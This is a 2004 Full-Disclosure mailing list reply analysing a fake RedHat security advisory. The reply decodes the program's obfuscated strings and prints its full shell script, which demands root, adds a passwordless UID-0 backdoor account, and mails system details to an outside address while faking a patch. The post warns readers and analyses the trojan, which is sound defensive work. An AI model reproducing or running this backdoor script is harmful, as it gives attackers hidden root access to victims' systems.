|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"
From: Andrew Farmer (andfarm
teknovis.com)
Date: Sun Oct 24 2004 - 20:18:41 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hugo van der Kooij wrote:
> Be advised.
> The message below is currently going around on internet. Being unsinged
> was the fist obvious issue. Not pointing to RPM updates, being in a
> different format and such were among the other reasong to suspect it.
> Message was send from 'University of Texas at Arlington'.
> I am sure none of you should be fooled by such a message but other
> might
> be.
> And while it lasts you may want to get the file for your own
> educational
> purposes.
<snip>
I did a quickie analysis of the program (which is basically just
distributed as source!).
Strings are encrypted with arcfour; however, as the keys are included
too, decrypting them is no problem.
pswd[] is an initialization vector for arcfour.
shll[] decodes to: /bin/sh
inlo[] decodes to: -c
xecc[] decodes to: exec '%s' "$"
lsto[] decodes to a null string.
chk1[] decodes to: KTZE4lIVf7i4BR
opts[], text[], and chk2[] are encrypted with some (apparently
constant) data retrieved by statting /bin/sh.
To cut to the chase, the whole thing ends up clearing the screen and
running the following shell script:
> #!/bin/sh
> cd /tmp/
> clear
> if [ `id -u` != "0" ]
> then
> echo "This patch must be applied as \"root\", and you are:
> \"`whoami`\""
> exit
> fi
> echo "Identifying the system. This may take up to 2 minutes. Please
> wait ..."
> sleep 3
> if [ ! -d /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." " ]; then
> echo "Inca un root frate belea: " >> /tmp/mama
> adduser -g 0 -u 0 -o bash >> /tmp/mama
> passwd -d bash >> /tmp/mama
> ifconfig >> /tmp/mama
> uname -a >> /tmp/mama
> uptime >> /tmp/mama
> sshd >> /tmp/mama
> echo "user bash stii tu" >> /tmp/mama
> cat /tmp/mama | mail -s "Inca o roata" rootaddlebrain.com >>
> /dev/null
> rm -rf /tmp/mama
> mkdir -p /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." "
> fi
>
> bla()
> {
> sleep 2
> echo -n "#"
> sleep 1
> echo -n "#"
> sleep 1
> echo -n "#"
> sleep 2
> echo -n "#"
> sleep 1
> echo -n "#"
> sleep 1
> echo -n "#"
> sleep 3
> echo -n "#"
> sleep 1
> echo -n "#"
> sleep 4
> echo -n "#"
> sleep 1
> echo -n "#"
> sleep 1
> echo "#"
> sleep 1
> }
>
> echo "System looks OK. Proceeding to next step."
> sleep 1
> echo
> echo -n "Patching \"ls\": "
> bla
> echo -n "Patching \"mkdir\": "
> bla
> echo
> echo "System updated and secured successfuly. You may erase these
> files."
> sleep 1
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (Darwin)
iD8DBQFBfFRxPa6RRaKl0ScRAunHAKC0vRGXCYxviDPA4OxIL9f1Kq1kiQCcDZpK
InTx2SYpJOGhQxE17Nf4WZg=
=jaVu
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]